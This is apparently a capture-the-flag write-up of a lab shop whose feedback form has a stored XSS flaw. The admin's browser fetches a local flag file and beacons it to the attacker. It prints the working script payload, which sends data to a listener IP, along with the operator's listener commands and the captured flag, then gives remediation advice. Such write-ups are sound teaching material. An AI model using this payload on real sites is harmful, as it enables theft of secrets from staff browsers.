Stored feedback XSS to admin browser reading local flag service
Foundations web engagement: customer feedback was rendered in the staff browser on the same host that listened on :8080/flag.txt; a stored XSS payload coerced the admin context to fetch and exfiltrate the secret.
- Case files
- Stored feedback XSS to admin browser reading local flag service
Feedback form lacked output encoding; admin reviewed submissions from the shop workstation; XSS fetched http://127.0.0.1:8080/flag.txt and posted contents to the operator listener.
Planted payload in feedback; admin view triggered fetch of :8080/flag.txt to operator webhook.
Engagement summary
Feedback form lacked output encoding; admin reviewed submissions from the shop workstation; XSS fetched http://127.0.0.1:8080/flag.txt and posted contents to the operator listener.
THE STICKER SHOP ran its public storefront and staff tooling on one workstation. Flag material sat on a localhost HTTP listener at :8080/flag.txt — unreachable from the engagement network, reachable from the admin browser. Customer feedback was accepted and later opened by that same browser without sanitization. Submitting a script tag that XHR/fetched 127.0.0.1:8080/flag.txt and beaconed the body to an external collector executed in the admin’s origin/context when staff reviewed the queue. Classic same-host operational failure: browsing untrusted input on the machine that holds local-only secrets.
Business impact
Localhost services that skip auth assume a trusted browser. Stored XSS turns every review session into an SSRF-capable footwork plane against 127.0.0.1. Separate review workstations from production secrets; sandbox feedback rendering; protect local admin ports with auth even on loopback.
Feedback XSS and localhost flag fetch
Planted payload in feedback; admin view triggered fetch of :8080/flag.txt to operator webhook.
STORED XSS
feedback-payload.html
<script>
fetch('http://127.0.0.1:8080/flag.txt')
.then(r => r.text())
.then(t => fetch('http://10.9.0.54:8000/?c=' + encodeURIComponent(t)));
</script>OPERATOR · XSS
savvy@lab:~$ curl -s http://10.10.10.10/ | grep -i feedback
feedback form → POST /submit
savvy@lab:~$ python3 -m http.server 8000
listening for admin beacon...
savvy@lab:~$ # submit feedback-payload.html via shop form
GET /?c=THM%7B83789a69074f636f64a38879cfcabe8b62305ee6%7D
Remediation
Context-encode all user HTML; deploy CSP that blocks inline script. Move flag/admin APIs off the browsing workstation or require auth on loopback. Staff should review untrusted content in an isolated VDI without routes to sensitive local ports.